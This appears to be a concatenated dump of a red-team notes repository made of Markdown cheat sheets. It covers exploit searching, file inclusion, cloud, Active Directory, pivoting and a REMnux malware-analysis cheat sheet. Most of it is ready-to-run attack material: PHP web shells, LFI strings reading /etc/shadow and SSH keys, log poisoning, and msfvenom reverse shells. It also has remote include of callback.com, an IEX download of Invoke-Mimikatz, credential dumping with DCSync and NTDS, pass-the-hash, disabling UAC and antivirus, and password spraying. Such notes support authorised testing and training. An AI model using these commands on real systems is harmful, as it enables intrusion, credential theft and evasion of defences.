25 | wget https://addons.mozilla.org/firefox/downloads/file/4098688/user_agent_string_switcher-0.5.0.xpi -o /tmp/user_agent_string_switcher-0.5.0.xpi
26 | firefox /tmp/user_agent_string_switcher-0.5.0.xpi 
27 | wget https://addons.mozilla.org/firefox/downloads/file/4095500/wappalyzer-6.10.62.xpi -o /tmp/wappalyzer-6.10.62.xpi 
28 | firefox /tmp/wappalyzer-6.10.62.xpi 
29 | 
30 | #download shells
31 | mkdir ~/shells
32 | wget https://raw.githubusercontent.com/flozz/p0wny-shell/master/shell.php -o ~/shells/p0wneyWebshell.php 
33 | wget https://raw.githubusercontent.com/WhiteWinterWolf/wwwolf-php-webshell/master/webshell.php -o ~/shells/wwwWebshell.php
34 | 
35 | #download scripts
36 | mkdir ~/PEScripts
37 | mkdir ~/PEScripts/Linux 
38 | curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
39 | wget https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh -o /home/kali/PEScripts/Linux/lse.sh 
40 | wget https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh -o /home/kali/PEScripts/Linux/LinEnum.sh
41 | wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -o /home/kali/PEScripts/Linux/les.sh
42 | wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py -o /home/kali/PEScripts/Linux/linuxprivchecker.py
43 | wget https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl -o /home/kali/PEScripts/Linux/linux-exploit-suggester-2.pl
44 | 
45 | mkdir ~/PEScripts/Windows 
46 | wget https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py -o /home/kali/PEScripts/Windows/wes.py 
47 | wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1 -o /home/kali/PEScripts/Windows/PowerUp.ps1
48 | 
49 | 


--------------------------------------------------------------------------------
/Exploitation/Public_Exploits.md:
--------------------------------------------------------------------------------
  1 | # Taking and Modifying Public Exploits 
  2 | ## Contents 
  3 | - [Taking and Modifying Public Exploits](#taking-and-modifying-public-exploits)
  4 |   * [Contents](#contents)
  5 |   * [Sites](#sites)
  6 |   * [Pre-requisites for running exploits](#pre-requisites-for-running-exploits)
  7 |   * [Installing searchsploit (Already in Kali)](#installing-searchsploit--already-in-kali-)
  8 |   * [Install binsploits](#install-binsploits)
  9 |   * [updating searchsploit](#updating-searchsploit)
 10 |   * [Basic Searching:](#basic-searching-)
 11 |   * [Exclude unwanted results](#exclude-unwanted-results)
 12 |   * [View exploits from Searchsploit](#view-exploits-from-searchsploit)
 13 |   * [Copy exploit to current working directory](#copy-exploit-to-current-working-directory)
 14 |   * [Access Exploits from Exploit-DB website:](#access-exploits-from-exploit-db-website-)
 15 |   * [Run an nmap scan result through searchsploit:](#run-an-nmap-scan-result-through-searchsploit-)
 16 |   * [Exploit not working](#exploit-not-working)
 17 |     + [Debugging Metasploit Exploits](#debugging-metasploit-exploits)
 18 |   * [Metasploit Quick Reference](#metasploit-quick-reference)
 19 | 
 20 | 
 21 | ## Sites
 22 | [NVD (National Vulnerability Database)](https://nvd.nist.gov/vuln/full-listing)   
 23 | 
 24 | [Exploit-DB](https://www.exploit-db.com/) 
 25 | 
 26 | [Rapid-7](https://www.rapid7.com/db/) 
 27 | 
 28 | ## Pre-requisites for running exploits
 29 | 
 30 | - Check the version of the operating system.
 31 | - Check the software version.
 32 | - Check if there is exploit for it (Searchsploit, ExploitDB, Google, etc).
 33 | - If you have an exploit, is there a Metasploit Module for it?
 34 | 
 35 | ## Installing searchsploit (Already in Kali)
 36 | 
 37 | - apt update && apt install exploitdb
 38 | 
 39 | ## Install binsploits
 40 | Note: bin-sploits contains a set of compiled binaries that are tied to exploits in the exploitdb database. Installing this package will take some time depending on your network connection. 
 41 | 
 42 |     apt update && apt install exploitdb-bin-sploits
 43 | 
 44 | ## updating searchsploit
 45 | 
 46 |     searchsploit -u
 47 | 
 48 | ## Basic Searching: 
 49 | 
 50 |     searchsploit <program> <Operating System> <programming language> <version #> etc
 51 |     searchsploit -t php windows
 52 | 
 53 | ## Exclude unwanted results
 54 |     
 55 |     searchsploit linux kernel 5.2 --exclude="Poc"
 56 | 
 57 | ## View exploits from Searchsploit
 58 |     
 59 |     searchsploit 9542 --examine
 60 |     searchsploit -x window/remote/42031.py
 61 | 
 62 | 
 63 | ## Copy exploit to current working directory
 64 |     
 65 |     searchsploit -m <Exploit Title> <Path>
 66 | 
 67 | ## Access Exploits from Exploit-DB website: 
 68 | 
 69 |     searchsploit vsftpd 2.3.4 -w
 70 | 
 71 | ## Run an nmap scan result through searchsploit: 
 72 | 1. Nmap -Pn 172.21.0.0 -oX results.xml
 73 | 2. searchsploit -x --nmap results.xml
 74 | 
 75 | Referneces: 
 76 | 
 77 | - https://www.exploit-db.com/documentation/Offsec-SearchSploit.pdf
 78 | 
 79 | 
 80 | ## Exploit not working
 81 | - run tcpdump and view traffic
 82 | - run Wireshark and view traffic
 83 | - Is there a firewall? - try ports you know the box is allowing traffic out of (ie. exploit port 8080, catch shell on 139) 
 84 | ### Debugging Metasploit Exploits 
 85 | help
 86 | info
 87 | 
 88 | See if target is vulnerable:
 89 | 
 90 |     check 
 91 |     
 92 | Advanced options
 93 | 
 94 |     show advanced 
 95 |     
 96 |  Debug exploit 
 97 |  
 98 |     set debug true
 99 |     set verbose true 
100 |     
101 | Change exploit code
102 | 
103 |     edit 
104 |     
105 |     
106 |  ## Metasploit Quick Reference
107 |  search [term] type:exploit platform:windows
108 |  
109 | [Metasploit Cheat Sheet](https://www.andreafortuna.org/2017/12/11/metasploit-console-my-own-cheatsheet/)  
110 | [Reference](https://ivanitlearning.wordpress.com/2019/10/03/exploit-code-debugging-in-metasploit/)  
111 | 


--------------------------------------------------------------------------------
/Web/File_Inclusion.md:
--------------------------------------------------------------------------------
  1 | # File Inclusion    
  2 | [PayloadAllTheThings FI](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion)  
  3 | ## Contents 
  4 | - [File Inclusion](#file-inclusion)
  5 |   * [Contents](#contents)
  6 |   * [Local File Inclusion](#local-file-inclusion)
  7 |     + [File Upload Pages](#file-upload-pages)
  8 |     + [LFI Testing](#lfi-testing)
  9 |     + [Interesting Files](#interesting-files)
 10 |     + [LFI to RCE via PHP Filters](#lfi-to-rce-via-php-filters)
 11 |   * [Remote File Inclusion](#remote-file-inclusion)
 12 |   * [Web Payloads](#web-payloads)
 13 |     + [Testing](#testing)
 14 | 
 15 | ## Local File Inclusion 
 16 | [Local File Inclusion](http://resources.infosecinstitute.com/local-file-inclusion-code-execution/#gref)   
 17 | [Guide to LFI](http://www.securityidiots.com/Web-Pentest/LFI/guide-to-lfi.html)    
 18 | 
 19 | Uses file inclusion to access files outside of the web root using relative or absolute file paths.      
 20 | Characters may be restricted or filtered - try URL encoding, double URL encoding, unicode / UTF-8 encoding.      
 21 | With LFI you may be able to view: config files, docs, source code, command history files, creds file, etc.          
 22 | 
 23 | ### File Upload Pages
 24 | Bypass extension filtering: rename file to an allowed extension (ie .php to .php.pdf file)        
 25 | Bypass header check:    
 26 | 
 27 |     %PDF-1.4
 28 |     <?php system($_GET["cmd"]); ?>
 29 | 
 30 | ### LFI Testing    
 31 | Check for client side scripts     
 32 | Use a [LFI wordlist](https://github.com/Karmaz95/crimson/blob/master/words/exp/LFI) to fuzz.     
 33 | More wordlists: [file inclusion Linux](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_linux.txt) and [file inclusion Windows](https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt)     
 34 | 
 35 |     http://example.com/index.php?page=../../../etc/passwd  
 36 |     http://example.com/index.php?page=../../../etc/passwd%00                  #PHP below v. 5.3.4 bypass
 37 |     http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00        # double encoding    
 38 |     http://example.com/index.php?page=....//....//etc/passwd
 39 |     http://example.com/index.php?page=..///////..////..//////etc/passwd
 40 |     http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
 41 | 	
 42 |     /etc/passwd, etc.
 43 |     can you include a remote file?
 44 |     ?test=php://filter/convert.base64-encode/resource=/filepath      -> base64 encode /decode  
 45 | 	
 46 |     http://example.labs/page.php?file=php://filter/resource=/etc/passwd             #php filter wrapper 
 47 | 	
 48 | 	
 49 | Vulnerable PHP functions
 50 | 
 51 |     include
 52 |     require
 53 |     include_once 
 54 |     require_once 
 55 | 	
 56 | ### Interesting Files 
 57 | Linux 
 58 | 
 59 |     /etc/passwd
 60 |     /etc/shadow
 61 |     /etc/issue
 62 |     /etc/group
 63 |     /etc/hostname
 64 |     /etc/ssh/ssh_config
 65 |     /etc/ssh/sshd_config
 66 |     /root/.ssh/id_rsa
 67 |     /root/.ssh/authorized_keys
 68 |     /home/user/.ssh/authorized_keys
 69 |     /home/user/.ssh/id_rsa
 70 | 
 71 | Windows 
 72 | 
 73 |     /boot.ini
 74 |     /autoexec.bat
 75 |     /windows/system32/drivers/etc/hosts
 76 |     /windows/repair/SAM
 77 | 
 78 | Log Poisoning 
 79 | 
 80 | 	open: /log/apache2/access.log 
 81 | 	send payload as user agent string: <?php system($_GET['cmd']); ?>    
 82 | 	/log/apache2/access.log&cmd=id      
 83 | 
 84 | ### LFI to RCE via PHP Filters        
 85 | If you think the input is being passed to a PHP include or require function.      
 86 | [Hacktricks LFI to RCE Using PHP Filters](https://book.hacktricks.xyz/pentesting-web/file-inclusion/lfi2rce-via-php-filters), [More Reading](https://www.synacktiv.com/publications/php-filters-chain-what-is-it-and-how-to-use-it.html)              	
 87 | Script: [lfi2rce_via_php_filters.py](https://github.com/lw8192/Red-Team-Rising/blob/main/Web/lfi2rce_via_php_filters.py)       
 88 | If you find an LFI at http://site.php/nav.php?include=       
 89 | 
 90 |     python3 lfi2rce_via_php_filters.py http://site.php/nav.php -p include -c pwd            
 91 | 
 92 | ## Remote File Inclusion 
 93 | Turning LFI to RFI: https://l.avala.mp/?p=241
 94 | [Reference](https://sushant747.gitbooks.io/total-oscp-guide/content/remote_file_inclusion.html)     
 95 | https://github.com/synacktiv/php_filter_chain_generator   
 96 | 
 97 | ## Web Payloads 
 98 | 
 99 | PHP
100 | 
101 |     <?php echo shell_exec($_GET['cmd']);?> 
102 |     <?php system($_GET['cmd']);?>
103 |     <?php passthru($_GET['cmd']);?>   
104 |       
105 |       
106 |     msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
107 |     cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
108 | 
109 | ASP
110 | 
111 |     msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
112 | 
113 | JSP
114 | 
115 |     msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
116 | 
117 | WAR
118 | 
119 |     msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
120 | 
121 | ### Testing 
122 | 
123 |     http://example.com/index.php?page=http://callback.com/shell.txt
124 |     http://example.com/index.php?page=http://callback.com/shell.txt%00
125 |     http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt
126 | 


--------------------------------------------------------------------------------
/Cloud/ReadMe.md:
--------------------------------------------------------------------------------
  1 | # Cloud Pentesting    
  2 | Main Cloud platforms: Amazon Web Services, Microsoft Azure, Google Cloud. Most cloud providers have miminal logging by default.        
  3 | [Hacking the Cloud](https://hackingthe.cloud/)    
  4 | [Grey Hat Warfare](https://buckets.grayhatwarfare.com/): search public buckets       
  5 | Use masscan to scan a large IP range:      
  6 | 
  7 |     $ masscan 10.10.0.1/24 -p 22,25,80,443,3389            
  8 |     --rate 50000   #fastest scan    
  9 |     #Most devices won't log half open SYN scans (nmap -sS and masscan) or TLS scan to web ports              
 10 | ## AWS     
 11 | AWS GuardDuty for security. No logging or versioning on by default.         
 12 | [AWS IP ranges](https://ip-ranges.amazon.aws/ip-ranges.json)         
 13 | [Pacu](https://github.com/RhinoSecurityLabs/pacu): AWS exploit framework      
 14 | 
 15 |     bash install.sh
 16 |     python3 pacu.py
 17 |     import_keys --all    
 18 | [WeirdAAL](https://github.com/carnal0wnage/weirdAAL): Amazon Attack Library     
 19 | [AWS_Pwn](https://github.com/dagrz/aws_pwn), 
 20 | 
 21 | Access     
 22 |      
 23 |      CLI: using AWS access key and AWS secret key. Set as enviromental variables.     
 24 |      Web: management web portal access.      
 25 |     AWS_ACCESS_KEY_ID = AKIA{REST OF KEY}     #long term key with no expiration date     
 26 |     AWS_ACCESS_KEY_ID = ASIS{REST OF KEY}     #short term access key     
 27 |     ACCESS KEY (long or short term) + secret access key = API authentication     
 28 | 
 29 | Pen Testing on a web server:     
 30 | 
 31 |      check for web requests to s3 buckets at https://s3.amazonaws.com/{bucketname} or https://s3-{region}.amazonaws.com/{Org}         
 32 |      Config issues:   
 33 | 
 34 | Set up enivromental variables to use AWS CLI       
 35 | 
 36 |     export AWS_ACCESS_KEY=AKIA{KEY}    
 37 |     export AWS_SECRET_ACCESS_KEY= {KEY}     
 38 |     #or use the below command and input the keys as values    
 39 |     aws configure     #set up, can put temp in all values   
 40 | 
 41 | AWS CLI Usage    
 42 | [AWS CLI Docs](https://awscli.amazonaws.com/v2/documentation/api/latest/reference/index.html)    
 43 | 
 44 |     https://aws.amazon.com/cli/   #AWS CLI    
 45 |    
 46 |     aws s3 ls s3://bucket.site.com    #list contents of a bucket    
 47 |     aws sl ls s3://bucket --region      
 48 |     aws --endpoint=http://site.com s3 ls s3://site.com   #list objects and common prefixes    
 49 |     aws sts get-caller-identity --endpoint-url http://bucket/    #user id, account and ARN    
 50 |     aws s3api get-bucket-acl --bucket bucket       
 51 |     aws s3 cp file.txt s3://bucket --profile user_profile    
 52 |   
 53 | might be able to upload a php web shell      
 54 | 
 55 |     echo '<?php system($_GET["cmd"]); ?>' > shell.php   #make web shell file   
 56 |     aws --endpoint=http://s3.site.com s3 cp shell.php s3://site.com     #upload web shell     
 57 | 
 58 | Find buckets    
 59 | [bucket_finder](https://github.com/FishermansEnemy/bucket_finder), [slurp](https://github.com/bbb31/slurp)          
 60 | 
 61 |     bucket_finder.rb search_term --download         
 62 |     python3 cloud_enum.py -k example.com       
 63 | Instance Metadata     
 64 | 
 65 |     "Metadata" endpoint: 169.254.169.254, should only be accessible from localhost. SSRF or other vulns might allow remote attacks to access it.         
 66 |     http://169.254.169.254/latest/meta-data/iam/security-credentials/     #IAM creds     
 67 |     http://169.254.169.254/latest/meta-data/iam/security-credentials/<IAM Role Name>    
 68 | 
 69 | Lambda   
 70 | 
 71 |     AWS Lambda: can have vulns and be used to steal AWS keys via command injection.            
 72 |     Denonia cryptominer malware targeted Lambda.     
 73 | Post Compromise:   
 74 | 
 75 |     Enum permissions of access keys     
 76 |     weirdAAL - recon_module, PACU priv esc     
 77 | ### Resources      
 78 | https://www.hackthebox.com/blog/aws-pentesting-guide    
 79 | https://cloud.hacktricks.xyz/pentesting-cloud/aws-security     
 80 | https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation    
 81 |     
 82 | ## Azure    
 83 | Built in security with Azure Sentinel. Azure acts as a middleman between the AD network and user sign on - makes lots of traditional AD acts ineffective.         
 84 | Azure Blob: https://{account}.blob.core.windows.net/{container}     
 85 | 
 86 | 
 87 | ### Enumerate Azure Blobs   
 88 | [Azure-CLI](https://learn.microsoft.com/en-us/cli/azure/install-azure-cli)     
 89 | [AZ-Blob-Attacker](https://github.com/VitthalS/Az-Blob-Attacker)    
 90 | [Basic Blob Finder](https://github.com/joswr1ght/basicblobfinder): search for Azure blobs       
 91 | [Microburst](https://github.com/NetSPI/MicroBurst): Scripts for pentesting Azure    
 92 | 
 93 |     basicblobfinder.py wordlist   #enum buckets       
 94 | Google Hacks:     
 95 | 
 96 |     site:*.blob.core.windows.net
 97 |     site:"blob.core.windows.net" and intext:"CONFIDENTIAL"
 98 | ### Resources:    
 99 | https://www.inversecos.com/2022/01/how-to-detect-and-compromise-azure.html      
100 | 
101 | ## Google Cloud   
102 | GCP Cloud Armor for security. [List of Buckets by IPS](https://www.gstatic.com/ipranges/cloud.json)           
103 | GCP: https://www.googleapis.com/storage/v1/b/{bucketname}      
104 | [GCPBucketBrute](https://github.com/RhinoSecurityLabs/GCPBucketBrute): search for Google Storage Buckets and check accesses.     
105 | Bucket permissions: listable (enum and read files), writeable (upload)       
106 | 
107 |     gcpbucketbrute.py -u -k search_org      
108 |     gsutil ls gs://bucket       #list contents of a public bucket     
109 | 


--------------------------------------------------------------------------------
/ActiveDirectory/LateralMovement.md:
--------------------------------------------------------------------------------
  1 | # Lateral Movement  
  2 | ## Contents 
  3 | - [Lateral Movement  ](#lateral-movement)
  4 |   * [Contents ](#contents)
  5 |   * [What to Look For ](#what-to-look-for)
  6 |   * [Quick Commands  ](#quick-commands)
  7 |     + [PowerShell Active Directory Module (only on DC by default)](#powershell-active-directory-module-only-on-dc-by-default)
  8 |   * [Post Exploitation Enumeration      ](#post-exploitation-enumeration)
  9 |     + [PowerView   ](#powerview)
 10 |   * [Bloodhound    ](#bloodhound)
 11 |   * [Mimikatz  ](#mimikatz)
 12 |   * [AD Password Files  ](#ad-password-files)
 13 |   * [Crackmapexec     ](#crackmapexec)
 14 |   
 15 | ## What to Look For 
 16 | Post Initial Exploitation  
 17 | Enumerate users and groups on the host.     
 18 | What privilege level does your user have?       
 19 | Is privilege escalation needed?    
 20 | Check user home folders (including command history, browser history, zipped archives)   
 21 | 
 22 | ## Quick Commands  
 23 | 
 24 |     net user
 25 |     net user /domain
 26 |     net user [username] /domain
 27 |     
 28 |     net localgroup
 29 |     net group /domain
 30 |     net group /domain "Domain Admins"  
 31 |          
 32 | ### PowerShell Active Directory Module (only on DC by default)
 33 | List all hosts on the domain      
 34 | 
 35 |     Get-ADComputer -Filter * -Properties ipv4Address, OperatingSystem, OperatingSystemServicePack | Format-List name, ipv4*, oper*      
 36 |     
 37 |     Get-ADUser
 38 |     Get-ADDomain
 39 |     Get-ADGroup
 40 |     Get-ADGroupMember -identity "Domain Admins" -Domain test.local -DomainController 10.10.10.10
 41 |     Find-DomainShare   
 42 |     
 43 | ## Post Exploitation Enumeration      
 44 | ### PowerView   
 45 | Powershell script to enum domain after gaining admin access to machine   
 46 | 
 47 | [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)   
 48 | [PowerView Cheat Sheet](https://gist.github.com/HarmJ0y/184f9822b195c52dd50c379ed3117993)    
 49 | [Cheat sheet](https://hackersinterview.com/oscp/oscp-cheatsheet-powerview-commands/)   
 50 | 
 51 |     powershell -ep bypass   
 52 |     . .\PowerView.ps1   
 53 |     Get-NetDomain   
 54 |     Get-NetUser   
 55 |     Get-NetComputer -fulldata   
 56 |     
 57 | ## Bloodhound    
 58 | [Bloodhound](https://github.com/BloodHoundAD/BloodHound)   
 59 | Bloodhound - GUI app installed on attack box, SharpHound - powershell script to enum and collect data -> exfiltrate as a zip file.     
 60 | 
 61 |     apt-get install bloodhound     
 62 | 
 63 | on victim, transfer file then import into Bloodhound and run queries   
 64 | 
 65 |     . .\SharpHound.ps1   
 66 |     Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip        
 67 |     
 68 | ## Mimikatz  
 69 | Extracts passwords, hashes, PIN codes and kerberos tickets from memory.   
 70 | [Mimikatz and Password Dumps Reference](https://ivanitlearning.wordpress.com/2019/09/07/mimikatz-and-password-dumps/)    
 71 | [Online Password Cracker - Crackstation](https://crackstation.net/)     
 72 | [Dumping Hashes with Mimikatz - Video](https://www.youtube.com/watch?v=AZirvtZNIEw)   
 73 | Loading Powershell Script 
 74 | 
 75 |     powershell.exe-exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"    
 76 |    
 77 |     privilege::debug   
 78 |     lsadump::sam   
 79 | 
 80 | Dumping credentials from LSASS  
 81 | 
 82 |     mimikatz # privilege::debug   
 83 |     mimikatz # sekurlsa::logonpasswords   
 84 | Dumping credentials from a minidump   
 85 | 
 86 |     mimikatz # sekurlsa::minidump lsass.dmp   
 87 |     mimikatz # sekurlsa::logonPasswords   
 88 |     
 89 | DCSync the krbtgt hash  
 90 | 
 91 |     mimikatz # lsadump::dcsync /domain:<domain> /user:krbtgt   
 92 | Pass the hash   
 93 |     
 94 |     mimikatz # sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<hash> /run:<cmd>   
 95 | Golden ticket creation and pass the ticket   
 96 |     
 97 |     mimikatz # kerberos::golden /user:<username> /domain:<domain> /sid:<domain_sid> /krbtgt:<krbtgt_hash>   
 98 |     
 99 | ## AD Password Files  
100 | NTSDS.dit (db) and SYSTEM registry hive. Can use built in ntdsutil.exe to backup AD. Then use another tool to extract DC hashes, since NTDS.dit is encrypted and opened exclusively for use by OS (can't be copied).     
101 | Back up AD files:    
102 | 
103 |     ntdsutil           
104 |     activate instance ntds     
105 |     ifm          #commands will generate backup of data in C:\ntds directory. Crack locally.    
106 |     
107 | Then locally extract NTDS.dit and SYSTEM registry data using Impacket script secretsdump.py  
108 | 
109 |     $ python secretsdump.py -system registry/SYSTEM -ntds Active\ Directory/ntds.dit LOCAL        
110 | 
111 | Or use Mimikatz to extract hashes from NTDS.dit    
112 | 
113 | mimikatz # lsadump::dcsync /domain:domain.local /all /csv          
114 | 
115 | ## Crackmapexec     
116 | --continue-on-success    #flag to continue to continue through a userlist even after a successful logon    
117 | 
118 | Dump SAM using adminc creds   
119 | 
120 |     crackmapexec smb 10.10.10.10 -u UserNAme -p 'PASSWORDH' --sam   #dump SAM - needs admin creds      
121 | Dump LSA secrets     
122 | 
123 |     crackmapexec smb 10.10.10.10 -u UserNAme -p 'PASSWORDH' --lsa   #dump lsa secrets - need admin on domain controller          
124 | Dump NTDS.dit using secretsdump - needs admin creds on a DC:        
125 | 
126 |     crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORD' --ntds     #dump all hashes    
127 |     crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORD' --ntds --users         
128 |     crackmapexec smb 192.168.1.100 -u UserNAme -p 'PASSWORD' --ntds vss     #uses volume shadow copy service to dump hashes     
129 | 


--------------------------------------------------------------------------------
/Tunneling/Pivot_Scanning.md:
--------------------------------------------------------------------------------
  1 | # Scanning though a pivot    
  2 | ## Contents    
  3 | - [Contents    ](#contents)
  4 | - [Subnet Enumeration Commands    ](#subnet-enumeration-commands)
  5 | - [ProxyChains    ](#proxychains)
  6 |   * [SSH Dynamic Tunnels     ](#ssh-dynamic-tunnels)
  7 |   * [Chisel   ](#chisel)
  8 |   * [Nmap scan through a dynamic SOCKS proxy  ](#nmap-scan-through-a-dynamic-socks-proxy)
  9 |   * [Web access:    ](#web-access)
 10 |   * [Use WinRM through proxychains         ](#use-winrm-through-proxychains)
 11 |   * [MSSQL Access Through Proxychains       ](#mssql-access-through-proxychains)
 12 |   * [RDP through ProxyChains       ](#rdp-through-proxychains)
 13 |   * [SMBExec Through Proxychains      ](#smbexec-through-proxychains)
 14 |   * [Brute Force a Service Through Proxychains    ](#brute-force-a-service-through-proxychains)
 15 | - [Uploading Static Binaries    ](#uploading-static-binaries)
 16 | - [Exploiting Through a Tunnel    ](#exploiting-through-a-tunnel)
 17 |   
 18 | ## Subnet Enumeration Commands    
 19 | Build an IP list then scan using nmap over proxychains    
 20 | Linux  
 21 |  
 22 |     ip a   
 23 |     arp -a
 24 |     cat /etc/hosts
 25 |     cat /etc/resolv.conf  
 26 |     netstat -antp    
 27 |     for x in {1..254};do (ping -c 1 10.1.1.$x | grep "bytes from" &); done | cut -d " "    
 28 | Windows     
 29 | 
 30 |     ipconfig   
 31 | ## ProxyChains    
 32 | Use tools like ProxyChains to scan new hosts without dropping tools to disk.     
 33 | /etc/proxychains.conf #config file. Specify SOCKS4/5 proxy    
 34 | Edit the below values in proxychains.conf or proxychains4.conf to get faster scan results (adjust based on quality of the connection and the baseline TCP response time):     
 35 | 
 36 |    tcp_read_time_out 1200       
 37 |    tcp_connect_time_out 800  
 38 | ### SSH Dynamic Tunnels     
 39 | Set up an SSH dynamic tunnel through a bastion host to scan an internal subnet using creds:      
 40 | 
 41 |     ssh -D 9050 user@bastion -N -f      
 42 | ### Chisel   
 43 | Set up a reverse tunnel using [Chisel](https://github.com/jpillora/chisel):    
 44 | (For CTFs you will most likely need the AMD64/x86_64 binary)       
 45 | 
 46 |     ./chisel server -p 8001 --reverse        #start Chisel server on attack box   
 47 |     ./chisel client 10.10.10.10:8001 R:1080:socks    #connect from to it from a client target server  
 48 |     # add 'socks5 127.0.0.1 1080 ' to /etc/proxychains.conf  
 49 | ### Nmap scan through a dynamic SOCKS proxy  
 50 | Only -sT will work - can be a bit slow with an SSH tunnel so setting up a Chisel proxy might be a better option:        
 51 | 
 52 |     proxychains nmap 10.10.10.10 -sT -p 80, 443     
 53 |     proxychains nmap -iL ips.txt -sT -sV   
 54 | ### Web access:    
 55 | 
 56 |     Use FoxyProxy Firefox extension and add a SOCKS5 proxy 127.0.0.1:9050 to access a site through a dynamic tunnel   
 57 | [Using Burp Through a SOCKS5 Proxy](https://dev.to/adamkatora/how-to-use-burp-suite-through-a-socks5-proxy-with-proxychains-and-chisel-507e)    
 58 | 
 59 |     Use Burp Upstream Proxies feature to add SOCKS5 proxy - set FoxyProxy Firefox addon to Burp proxy     
 60 |     Burp -> Settings (upper right corner) -> Network -> Connections -> SOCKS Proxy             
 61 |     Select the option 'Override options for this project only'. Options: 127.0.0.1, 1080, use SOCKS proxy     
 62 | 
 63 | ### Use WinRM through proxychains         
 64 | 
 65 |     proxychains crackmapexec winrm 10.10.10.10 -u "USERNAME" -p "PASSWORD" -x "command"    
 66 |     proxychains evil-winrm -u Administrator -H 'hash' -i 10.10.10.10    #pass the hash         
 67 | ### MSSQL Access Through Proxychains       
 68 |  
 69 |     proxychains sqsh -S 172.16.1.5 -U user -P password    
 70 | ### RDP through ProxyChains       
 71 | 
 72 |     proxychains xfreerdp /u:DOMAIN\\username /p:password /v:ip      
 73 | ### SMBExec Through Proxychains      
 74 | Using Impacket SMBexec.py script - often caught by AV so be careful. Smbexec has limited commands, so you will want to execute a payload to get a shell.            
 75 | 
 76 |     proxychains -q smbexec.py test/admin:test@192.168.1.10         
 77 |     proxychains -q /usr/share/doc/python3-impacket/examples/smbexec.py domain/user:'password'@172.16.1.5    
 78 |     
 79 | ### Brute Force a Service Through Proxychains    
 80 | 
 81 |     proxychains -q hydra 10.10.10.10 ssh -s 22 -L users.txt -P passwords.txt -t 4     
 82 |     proxychains -q hydra -L usernames -P passwords 10.10.10.0/24 ftp       #brute force a subnet   
 83 |     proxychains -q hydra -L users –P passwords <IP> mssql   #MSSQL    
 84 |     proxychains -q hydra -C creds.txt -M ips.txt ftp    #password spray a lis
 85 |     
 86 | ## Uploading Static Binaries    
 87 | Use static binaries from [here](https://github.com/ernw/static-toolbox) or [here](https://github.com/andrew-d/static-binaries)     
 88 | Upload nmap binary to a Windows target (through meterpreter and scan)      
 89 | 
 90 |     meter > upload nmap_binary      
 91 |     meter > shell     
 92 |     #then disable UAC  
 93 |     C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f     
 94 |     meter > killall av       #turn off AV
 95 |     meter > shutdown /r    
 96 |     #wait a few minutes then renew the Meterpreter session    
 97 |     meter > nmap-setup.exe /S   #install nmap silently   
 98 | Upload nmap binary to a Linux target (through meterpreter and scan)      
 99 | 
100 |     meter > upload nmap . 
101 |     chmod +x run-nmap.sh   
102 |     ./run-nmap.sh   
103 |     
104 | ## Exploiting Through a Tunnel    
105 | Web exploits in Python - you probably need to proxy the traffic through a tunnel (probably socks5) using requests:    
106 | 
107 |     proxies = {
108 |       "http": "socks5://127.0.0.1:1080",
109 |     }
110 | 
111 |     proxies ={'http':'http://127.0.0.1:8080','https': 'https://127.0.0.1:8080'}      #burp proxy   
112 | 
113 |     r = requests.get(url, proxies=proxies)        
114 |     


--------------------------------------------------------------------------------
/Malware_Analysis/REMnux_CheatSheet.md:
--------------------------------------------------------------------------------
 1 | # REMnux Cheat sheet
 2 | Modified from: https://sansorg.egnyte.com/dl/X7Hif4acY0    
 3 | 
 4 | ## Getting Started with REMnux
 5 | 1. Get REMnux as a [virtual appliance](https://docs.remnux.org/install-distro/get-virtual-appliance), [install the distro on a dedicated system](https://docs.remnux.org/install-distro/install-from-scratch), or [add it to an existing one](https://docs.remnux.org/install-distro/add-to-existing-system).
 6 | 2. Review REMnux documentation at [docs.remnux.org](https://docs.remnux.org/).
 7 | 3. Keep your system up to date by periodically running "remnux upgrade" and "remnux update".
 8 | 4. Become familiar with REMnux malware analysis tools [available as Docker images](https://docs.remnux.org/run-tools-in-containers/remnux-containers).
 9 | 5. Know default logon credentials: remnux/malware
10 | 
11 | ## General Commands on REMnux
12 | Shut down the system. . . . . . . . shutdown   
13 | Reboot the system. . . . . . . . . . . reboot   
14 | Switch to a root shell. . . . . . . . . sudo -s   
